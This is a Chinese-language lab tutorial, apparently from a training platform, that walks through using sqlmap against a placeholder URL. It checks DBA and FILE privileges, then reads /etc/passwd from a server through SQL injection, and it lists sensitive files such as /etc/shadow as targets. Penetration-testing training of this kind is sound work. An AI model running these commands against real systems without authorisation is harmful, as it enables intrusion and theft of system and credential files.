使用 sqlmap 从服务器读取任意文件

引言

在本实验中，你将探索 sqlmap 的一项强大功能。sqlmap 是一款流行的开源渗透测试工具，可自动化检测和利用 SQL 注入漏洞的过程。具体来说，你将学习如何使用 sqlmap 从目标服务器读取任意文件。当底层数据库用户拥有足够权限（例如 DBA 权限）且数据库系统允许从文件系统读取文件时，通常可以实现此功能。理解此技术对于道德黑客和安全专业人员识别和缓解此类漏洞至关重要。

确认 DBA 权限和文件读取权限

在此步骤中，我们将模拟一个场景：你已识别出 SQL 注入漏洞，现在正在使用 sqlmap 来评估数据库用户的权限。要从服务器读取任意文件，数据库用户通常需要 DBA（数据库管理员）权限或特定的文件读取权限。我们将使用 sqlmap 来检查当前数据库用户是否拥有这些提升的权限。

首先，假设你有一个易受攻击的 URL。在本实验中，我们将使用一个占位符 URL。如果你正在真实的测试环境中执行此操作，请将 http://example.com/vulnerable?id=1 替换为你实际的目标。

要检查 DBA 权限，请将 --is-dba 标志与 sqlmap 一起使用：

sqlmap -u "http://example.com/vulnerable?id=1" --is-dba

注意： 在实际场景中，sqlmap 会先检测到 SQL 注入，然后继续检查 DBA 权限。在本实验中，我们专注于文件读取方面，因此我们将假设 sqlmap 已经找到了注入点。

如果输出显示 [INFO] current user is DBA: True，则表示该用户拥有 DBA 权限，这通常意味着可以读取文件。

接下来，要检查文件读取权限，你可以使用 --file-priv 标志：

sqlmap -u "http://example.com/vulnerable?id=1" --file-priv

此命令将尝试确定数据库用户是否拥有在文件系统上读取和写入文件的必要权限。如果输出显示 [INFO] current user has FILE privilege: True，则你很可能可以继续读取文件。

示例输出（模拟）：

        _
       ___| |_____ ___ ___ ___ {1.7.10#stable}
      |_ -| . |     | . | . |
      |___|_|___|_|_|_  |_|___| V
                       |_|   http://sqlmap.org

[INFO] starting @ 12:34:56 /2023-10-26/
[INFO] fetched data: 'True'
[INFO] current user is DBA: True
[INFO] fetched data: 'True'
[INFO] current user has FILE privilege: True
[INFO] shutting down @ 12:34:57 /2023-10-26/

此输出确认数据库用户同时拥有 DBA 和 FILE 权限，从而可以进行任意文件读取。

识别已知绝对文件路径（例如 /etc/passwd）

在此步骤中，你需要识别远程服务器上你希望读取的目标文件。在演示任意文件读取漏洞时，一个常见的目标是 Linux 系统上的 /etc/passwd，因为它包含用户账户信息，并且通常是可公开读取的。其他潜在目标可能包括配置文件、Web 服务器日志或应用程序源代码，具体取决于系统和你的目标。

在本实验中，我们将假设目标服务器是 Linux 系统，并且我们想要读取 /etc/passwd 的内容。了解你打算读取的文件的绝对路径至关重要。没有绝对路径，sqlmap 无法在远程系统上定位该文件。

在此步骤中，你无需执行任何命令，而是要理解识别有效绝对文件路径的重要性。这些信息通常通过侦察、Web 应用程序的错误消息或猜测常见文件位置来获得。

Linux 上常见文件路径示例：

• /etc/passwd (用户账户信息)
• /etc/shadow (哈希密码 - 通常需要 root 权限才能读取)
• /etc/hosts (网络主机名)
• /etc/nginx/nginx.conf 或 /etc/apache2/apache2.conf (Web 服务器配置)
• /var/log/auth.log 或 /var/log/syslog (系统日志)
• /proc/self/cmdline (当前进程命令行)

在本实验中，我们将继续以 /etc/passwd 作为我们的目标文件。

使用 --file-read 标志指定远程文件

在此步骤中，你将学习如何在 sqlmap 中使用 --file-read 标志来指定你希望从远程服务器读取的文件的绝对路径。此标志是任意文件读取功能的核心。

使用 --file-read 的语法很简单：

sqlmap -u "http://example.com/vulnerable?id=1" --file-read="/path/to/remote/file"

将 http://example.com/vulnerable?id=1 替换为你的目标 URL，将 /path/to/remote/file 替换为你在上一步中识别的文件的绝对路径。

在本实验中，我们将尝试读取 /etc/passwd。完整的命令将如下所示：

sqlmap -u "http://example.com/vulnerable?id=1" --file-read="/etc/passwd"

当 sqlmap 成功读取文件时，它会将内容本地保存在 ~/.sqlmap/output/<target_host>/files/ 目录下的一个文件中。文件名通常与远程文件名相同（例如 passwd）。

注意： sqlmap 将自动处理 SQL 注入 payload 的生成和执行。你的角色是提供易受攻击的 URL 和目标文件路径。

执行命令读取远程文件

现在，是时候执行你在上一步中构建的 sqlmap 命令来实际读取远程文件了。在 LabEx 环境中打开你的终端并运行该命令。

sqlmap -u "http://example.com/vulnerable?id=1" --file-read="/etc/passwd"

重要提示： 由于这是一个模拟环境，sqlmap 不会真正连接到活动的易受攻击的服务器。但是，它将模拟该过程并输出信息，就像它正在进行一样。你将看到 sqlmap 的典型输出，包括有关注入过程和读取文件尝试的信息。

示例输出（模拟）：

        _
       ___| |_____ ___ ___ ___ {1.7.10#stable}
      |_ -| . |     | . | . |
      |___|_|___|_|_|_  |_|___| V
                       |_|   http://sqlmap.org

[INFO] starting @ 12:35:00 /2023-10-26/
[INFO] fetched data: 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
... (为简洁起见已截断) ...
labex:x:1000:1000:LabEx User,,,:/home/labex:/bin/bash'
[INFO] file '/etc/passwd' saved to '/home/labex/.sqlmap/output/example.com/files/passwd'
[INFO] shutting down @ 12:35:05 /2023-10-26/

需要关注的关键行是 [INFO] file '/etc/passwd' saved to '/home/labex/.sqlmap/output/example.com/files/passwd'。这表明 sqlmap 已成功“读取”了文件，并将其内容保存在你的本地机器上，位于 sqlmap 的输出目录中。

查看本地保存的文件内容

在最后一步中，你将通过查看文件在你本地的 LabEx 环境中的内容，来验证该文件确实被 sqlmap “读取”并保存了。如前所述，sqlmap 会将提取的文件保存在特定的目录结构中。

路径通常是 ~/.sqlmap/output/<target_host>/files/。在我们模拟的示例中，目标主机是 example.com，文件是 passwd。因此，保存文件的完整路径将是 ~/.sqlmap/output/example.com/files/passwd。

你可以使用 cat 命令来查看此文件的内容：

cat ~/.sqlmap/output/example.com/files/passwd

示例输出（模拟）：

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
... (为简洁起见已截断) ...
labex:x:1000:1000:LabEx User,,,:/home/labex:/bin/bash

此输出证实了 sqlmap 已成功从模拟的远程服务器“读取”了 /etc/passwd 文件并将其本地保存，允许你检查其内容。这展示了使用 sqlmap 进行任意文件读取的完整过程。

总结

在此次实验中，你已成功学会如何使用 sqlmap 从模拟的易受攻击服务器执行任意文件读取操作。你首先了解了确认 DBA 或文件读取权限的重要性。然后，你识别了一个常见的目标文件（/etc/passwd），并使用 --file-read 标志指示 sqlmap 提取其内容。最后，你通过查看本地保存的文件来验证了提取的成功。这项技能对于渗透测试人员评估 SQL 注入漏洞的影响至关重要，也帮助开发者理解正确权限管理和输入验证对于防止此类攻击的重要性。